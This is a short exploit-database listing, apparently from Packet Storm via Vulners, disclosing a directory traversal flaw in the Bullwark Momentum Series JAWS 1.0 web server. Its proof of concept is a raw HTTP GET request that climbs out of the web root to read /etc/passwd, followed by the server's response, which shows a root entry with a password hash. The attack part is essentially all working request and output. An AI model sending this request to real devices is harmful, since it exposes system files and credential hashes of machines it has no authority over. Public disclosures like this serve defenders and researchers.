Bullwark Momentum Series JAWS 1.0 Directory Traversal

🗓️ 12 Dec 2019 00:00:00Reported by numan turleType

packetstorm🔗 packetstormsecurity.com👁 165 Views

Bullwark Momentum Series JAWS 1.0 Directory Traversal, 2019-12-11, Numan Türle, http://www.bullwark.net/Kategoriler.aspx?KategoriID=24, Exploit: Directory Traversal in Bullwark Momentum Series JAWS 1.

`# Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal  
# Date: 2019-12-11  
# Author: Numan Türle  
# Vendor Homepage: http://www.bullwark.net/  
# Version : Bullwark Momentum Series Web Server JAWS/1.0  
# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24  
  
POC  
---------  
  
GET /../../../../../../../../../../../../etc/passwd HTTP/1.1  
Host: 12.0.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Accept-Encoding: gzip, deflate  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
Response  
---------  
  
root:ABgia2Z.lfFhA:0:0::/root:/bin/sh  
`

12 Dec 2019 00:00Current

0.6Low risk

Vulners AI Score0.6